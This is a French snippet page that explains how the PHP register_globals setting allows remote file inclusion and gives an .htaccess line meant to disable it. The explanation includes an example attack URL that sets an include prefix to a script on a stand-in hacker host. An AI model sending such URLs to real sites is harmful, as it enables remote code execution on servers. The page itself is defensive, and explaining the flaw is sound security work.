Information sur le code source

Enregistr� le 22 Juin 2008 - Vu 15266 fois

Code source zipp�: t�l�charger le zip

Impression: imprimer le code

Sociale bookmarking:

Votre avis:

Ecrit par : admin

[66] sources en Apache voir

Description du code source

Informations sur le code source

Les hackers exploitent souvent la facilité qui consiste à définir les variables GET ou POST en variables globales. Par exemple la variable $_GET['var1'] est également accessible par $var1. Le cas le plus fréquent d'exploitation est l'utilisation d'une variable préfixant le chemin des includes comme :
include($prefix_path . '/chemin_d_include.php');
Ainsi l'appel de l'url http://www.example.com/page.php?prefix_path=http://sitehacker.com/script.txt peut permettre de faire exécuter l'include externe http://sitehacker.com/script.txt/chemin_d_include.php.
La désactivation de cette option nécessite de contrôler tous le code pour toujours accéder aux variables avec les tableaux $_ENV, $_GET, $_POST, $_REQUEST, $_COOKIE et $_SERVER et non directement avec leur nom. Pour plus d'informations vous pouvez lire l'explication détaillée ici.
Pour éviter cette faille, il suffit de désactiver l'enregistrement global avec cette règle dans le fichier .htaccess.

Code Source

.01
.02
.03
.04
.05
.06
.07
.08
.09
.10
.11
.12
.13
.14
.15
.16
.17
.18
.19
.20
.21


################################################################################
#                                                                              #
#                         __                   _ __  _                         #
#               __ ______/ /______ _    ______(_) /_(_)__  ___ _               #
#              / // / __/ / __/ -_) |/|/ / __/ / __/ / _ \/ _ `/               #
#              \_,_/_/ /_/_/  \__/|__,__/_/ /_/\__/_/_//_/\_, /                #
#                                                        /___/                 #
#                                                                              #
#                                                                              #
################################################################################
#                                                                              #
# Titre          : Protection contre les attaques de hacker avec register...   #
#                                                                              #
# URL            : /scripts66-Apache.htm             #
# Auteur         : admin                                                       #
# Date �dition   : 22 Juin 2008                                                #
#                                                                              #
################################################################################

SetEnv REGISTER_GLOBALS 0

Ajouter un commentaire

	RSS snippets RSS commentaires * Email * S�curit� :
Attention: Les champs marqu�s d'une �toile * sont obligatoires

Librairie

Langages de programmation

La librairie est ouverte � tous et elle est acc�s principalement sur les langages Snippets. Vous trouverez aussi d'autres langages de programmation tel que le CSS, HTML, AJAX, ASP.. Plus de 300 r�f�rences facilement accessibles. Visiter